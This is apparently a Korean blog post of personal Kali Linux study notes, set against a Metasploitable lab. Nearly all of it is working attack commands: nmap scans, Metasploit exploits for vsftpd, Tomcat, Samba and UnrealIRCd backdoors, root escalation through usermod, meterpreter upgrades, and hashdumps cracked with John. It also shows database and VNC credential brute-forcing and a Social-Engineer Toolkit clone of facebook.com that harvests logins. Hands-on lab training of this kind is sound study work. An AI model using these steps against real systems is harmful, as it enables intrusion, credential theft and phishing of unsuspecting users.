๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Welcome.
:: Linux ๐Ÿšฉ/Linux_basic

[๋ฆฌ๋ˆ…์Šค] [์นผ๋ฆฌ ๋ฆฌ๋ˆ…์Šค(KALI LINUX)]

by EunBird 2021. 5. 26.


# password ์„ค์ •
sudo passwd

su

# ์žฌ๋ถ€ํŒ… ํ—ˆ์šฉ ์ฐฝ์ด ๋‚˜์˜ฌ๊ฒฝ์šฐ YES ํด๋ฆญ
apt-get update && apt-get upgrade -y

# ํ•œ๊ธ€ ํฐํŠธ ์„ค์น˜
apt-get install -y fcitx-lib* 
apt-get install -y fcitx hangul* 
apt-get install -y fonts-nanum*

reboot

service postgresql start 

#db ์ดˆ๊ธฐํ™”
msfdb init

 

msfconsole

msfconsole ์ž…๋ ฅ.


# ํ•ด๋‹น ip์—์„œ ์‚ฌ์šฉํ•˜๋Š” ์„œ๋น„์Šค ์ถœ๋ ฅ
nmap 192.168.108.134

# ํ•ด๋‹น ip์—์„œ ์‚ฌ์šฉํ•˜๋Š” ์„œ๋น„์Šค ์ž์„ธํžˆ ์ถœ๋ ฅ
nmap -sV 192.168.108.134

nmap -sV 192.168.108.134 ์ž…๋ ฅ. 


# msfadmin / msfadmin
ftp 192.168.108.134



cd /etc

# passwd ํŒŒ์ผ์„ ๋ฐ›์„์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์ 
get passwd

quit

msfconsole

search vsftpd
=> vsftpd ์˜ ์ทจ์•ฝ์  ํ™•์ธ
== ์•„๋ž˜์™€ ๊ฐ™์ด๋‚˜์˜ด
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

 

 

==
use exploit/unix/ftp/vsftpd_234_backdoor

show options : ํ˜„์žฌ ๊ณต๊ฒฉ ๋Œ€์ƒ ์ƒํƒœ

set RHOSTS 192.168.108.134 : ๊ณต๊ฒฉ ๋Œ€์ƒ ์ง€์ •

show options : RHOSTS ๋“ค์–ด๊ฐ„๊ฒƒ ํ™•์ธ

exploit

ls -la :  ๊ณต๊ฒฉ ๋˜๋Š”์ง€ ํ™•์ธ

usermod -u 0 -o msfadmin : -o ์ค‘๋ณต ํ—ˆ์šฉ ์˜ต์…˜ msfadmin ์—๊ฒŒ root๊ถŒํ•œ์„ ์ค€๋‹ค.

# msfadmin uid 0 ์ธ์ง€ ํ™•์ธ
cat /etc/passwd | grep msfadmin

๊ณ„์† ๋™์ž‘ ์„œ๋น„์Šค ํ™•์ธํ•˜๊ธฐ ํž˜๋“ค๊ธฐ ๋•Œ๋ฌธ์—

nmap ๊ฒฐ๊ณผ๋ฅผ ํ…์ŠคํŠธ ํŒŒ์ผ๋กœ ์ €์žฅ

nmap -sV 192.168.106.130 >> /home/nmap_result.txt

 

 

ex)

-- tomcat ๋กœ๊ทธ์ธ ํƒˆ์ทจ

msfconsole

use auxiliary/scanner/http/tomcat_mgr_login

set RHOSTS 192.168.106.130

set RPORT 8180

exploit

----------------------------------------

back <-- metasploit ์—์„œ exit ๋ฐ”์Šทํ•œ ์—ญํ™œ

-- deploy ๊ธฐ๋Šฅ์„ ์ด์šฉํ•œ ๊ณต๊ฒฉ ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•˜์—ฌ ์‹œ์Šคํ…œ ์‰˜์„ ํš๋“ํ•˜์‹œ์˜ค

use exploit/multi/http/tomcat_mgr_deploy

set HttpPassword tomcat

set HttpUsername tomcat

set RHOSTS 192.168.106.130

set RPORT 8180

exploit

----------------------------------------

-- samba - usermap_script

use exploit/multi/samba/usermap_script

set RHOSTS 192.168.106.130

exploit

-----------------------------------

-- ๊ธฐ๋ณธ ์‰˜์„ ๋ฉ”ํƒ€ํ”„๋ฆฐํ„ฐ ์‰˜๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ

์„ธ์…˜์„ ์—ฐํ›„ Ctrl + Z ๋ฅผ ๋ˆŒ๋Ÿฌ ๋‚˜๊ฐ€๋ฉด ์„ธ์…˜์ด ์œ ์ง€๋œ๋‹ค.

sessions : ์„ธ์…˜ ํ™•์ธ ๋ช…๋ น์–ด

search meterpreter

use post/multi/manage/shell_to_meterpreter

set session 2

show options

run

sessions 3

-------------------------------

-- ๋น„๋ฐ€๋ฒˆํ˜ธ ํƒˆ์ทจ

use post/linux/gather/hashdump

set session 4 (๋ฉ”ํƒ€ํ”„๋ฆฐํ„ฐ ์‰˜ ์„ ํƒ)

exploit

Unshadowed Password File: /root/.msf4/loot/20200921214617_default_192.168.106.130_linux.hashes_404031.txt
=> ์ด๊ณณ์— ํŒจ์Šค์›Œ๋“œ ์ €์žฅ๋จ

mv /root/.msf4/loot/20200921214617_default_192.168.106.130_linux.hashes_404031.txt /home/password.txt

john /home/password.txt

-----------------

-- ์„ธ์…˜ ์‚ญ์ œ

sessions -k 2

-----------------

-- mysql ๊ณต๊ฒฉ

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 192.168.0.212

exploit

mysql -h 192.168.0.212 -u root

-----------------

use auxiliary/scanner/mysql/mysql_schemadump

set RHOSTS 192.168.0.212

set PASSWORD root

set USERNAME root

run

-------------------

use auxiliary/scanner/mysql/mysql_hashdump

set RHOSTS 192.168.0.212

set USERNAME root

set PASSWORD root

------------------

-- vnc

use auxiliary/scanner/vnc/vnc_login

set RHOSTS 192.168.0.212

exploit

-- ์œ„ vnc_login์—์„œ ์–ป์€ password๋ฅผ ํ†ตํ•ด vnc ์ ‘์†
echo "password" | vncviewer 192.168.0.212 -autopass

------------------

-- irc

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 192.168.0.212

exploit

------------------

postgres(databases) ์„œ๋น„์Šค์˜ ๊ณ„์ • ๋น„๋ฐ€๋ฒˆํ˜ธ์™€ ํ…Œ์ด๋ธ” ๋ชฉ๋ก์„ ์กฐํšŒํ•˜๋ผ

use auxiliary/scanner/postgres/postgres_login 

set RHOSTS 192.168.0.212

exploit

psql -h 192.168.0.212 -U postgres

postgres / postgres

\list -- db ์กฐํšŒ

\c postgres -- db(postgres) ์ง€์ •

\dn ์Šคํ‚ค๋งˆ ํ‘œ์‹œ

\dt *.* -- ํ…Œ์ด๋ธ” ์กฐํšŒ
SELECT * FROM pg_tables; ๋„๊ฐ€๋Šฅ

\! clear : \! ๋กœ bash ๋ช…๋ น์–ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Œ

---------------------------------------

use auxiliary/scanner/postgres/postgres_hashdump

set RHOSTS 192.168.0.212

run

---
3175bce1d3201d16594cebf9d7eb3f9d
---

METASPLOITABLE


FAKESITE

-- ์นผ๋ฆฌ ๋ฆฌ๋ˆ…์Šค ํ„ฐ๋ฏธ๋„

-- ํŽ˜์ดํฌ ์‚ฌ์ดํŠธ ์ƒ์„ฑ
setoolkit

y

-- Social-Engineering Attacks


-- WebSite Attack Vectors
2

-- Credential Harvester Attack Method
3
--------------------------
์ƒˆ๋กœ์šด ํ„ฐ๋ฏธ๋„์—์„œ apche2 ์‹œ์ž‘ ํ›„ ์›๋ž˜ ํ„ฐ๋ฏธ๋„๋กœ ๋Œ์•„๊ฐ
Ctrl + Shift + T

service apache2 start
--------------------------

-- Site Cloner


-- ์ž์‹ ์˜ IP
192.168.0.156

-- fake Target ์‚ฌ์ดํŠธ
http://www.facebook.com

y

์›น์‚ฌ์ดํŠธ์—์„œ ์ž์‹ ์˜ IP ์ฃผ์†Œ ์ ‘์†

๋กœ๊ทธ ํŒŒ์ผ ์œ„์น˜

rm ./.set/site-template

: << 'FAKESITE'

728x90

๋Œ“๊ธ€